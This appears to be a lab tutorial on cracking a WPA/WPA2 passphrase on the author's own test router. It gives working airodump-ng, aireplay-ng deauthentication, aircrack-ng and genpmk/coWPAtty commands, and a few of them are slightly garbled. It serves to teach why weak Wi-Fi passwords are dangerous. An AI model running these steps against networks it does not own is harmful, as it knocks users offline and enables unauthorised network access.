One of the things that we will try out with breaking through WPA and WPA2, is by using a dictionary attack. Dictionary attack is a technique to break through an authentication mechanism by trying to figure out it’s decryption key or passphrase by trying out hundreds, thousands or even billions of likely possibilities. Most vulnerable victims of this attacks are Wi-Fi’s that have their password set to something simple, such as “cat”, “dog”, “airplane”, “football” and so on – like the words in a dictionary.
Firstly we need to connect to our Access Point, set it’s wireless security to WPA/WPA2 and set it’s version to WPA-PSK. Since the point of this attack is to show the vulnerabilities of poor passwords, we will set out password to be abcdefgh
Now let’s start up airodump again, and order it to only follow our router’s traffic with the following command:
airodump-ng --bssid <mac address here> --channel <number> --write <name of file> wlan1mon
The output of the command should show the familiar interface again, which lists all the devices connected to the router in the “STATION” column.
In order to perform the dictionary attack, we need to capture the four-way WPA handshake from the router. You can get the handshake by just waiting for any new client to connect to the router, or you can send a deauthentication packet in a broadcast signal to force all clients to reconnect. Open up a new terminal window with CTRL + SHIFT + T and type in the following command to send a deauthentication packet:
aireplay-ng --deauth 1 -a <mac address of router> wlan1mon --ignore-negative-one
You can also target a specific device for deauthentication with the -c command = -c standing for client and then adding the the client’s mac address after that.
Now if you go back to the airodump tab, you can see on the top right that it has collected the WPA handshake, and has stored it in the WPAcracktest file that we created before.
You can confirm the the WPAcracktest pcap file has been created by typing in ls and checking if there is a <filename>-01.cap in the home directory.
Now that we have our pcap file with the WPA handshake, let’s open up Wireshark and from the top left corner open the File WPAcracktest-01.cap or whatever you named it.
Now we can filter Wireshark to only show the four-way handshake by typing in the filter bar eapol. EAPOL stands for Extensible Authentication Protocol Over Lan and is an encapsulation protocol to hide the credentials. From Wireshark we can see in the Info -column, that it contains all the keys of the handshake, stated with (Message 1 of 4), (Message 2 of 4) and so on.
Unfortunately Wireshark is unable to show us the key from the first login session. But now we will move on into the actual cracking part. So as we stated before, dictionary attack relies on having a likely password pre-written in the list. It won’t work that easily on passwords that have special character’s or a lot of numbers, but if your list is comprehensive enough and contains hundreds of thousands or millions of different words and number combinations, you increase the likelihood of getting a matching password with the actual crack.
Kali ships out of the box many password lists, but for this excessive we chose to use a nmap.lst file. You may use any password list you want, but keep in mind that the list has to have the same word written in the list for this to work.
You can see how many password lists are just in the metasploit folder by typing the following command:
Now let’s use aircrack-ng with the combination of the pcap file that we got from the handshake, and the password list. The crack tool will compare the four-way handshake with the password list to find out the correct password. Type in the following command to initiate the crack:
aircrack-ng <filename>-01.cap -w <file location>
Now the aircrack will start working on the password list and see if any word on the list matches with the pcap file.
And the key was found! Keep in mind that if the word is not pre-written in the password list this wont work. This is why it’s always recommended to have a safe password with numbers and special characters added in your Wi-Fi, to prevent this kind of attack happening.
With Aircrack-ng, everytime you time to crack a Wi-Fi network with the dictionary attack, it uses processing power during the attack. If you use a massive dictionary list with numerous different password phrases, this might take a while. If you want to crack the same network multiple times there is a way to speed up things. We can precalculate the PSK/PMK with genPMK and coWPAtty.
In order to use genpmk to precalculate the password key, we will use the following command:
genpmk -f <file location> -d PMK-<routername> -s "<routername>"
Now that the genpmk has precalculated the nmap.lst password list, it’s time to use coWPAtty to compare the precalculated password list with the WPA handshake stored in the pcap file that we got earlier from the airodump-ng.
To begin processing the password list with cowpatty, type in the following command:
cowpatty - d PMK-<routername> s "routername" -r <pcap file name>
And success! Here you can see the difference in speed with Aircrack and coWPAtty. In our case Aircrack handles around 3743,40 keys per second, whereas cowpatty processed 207375.88 keys per second.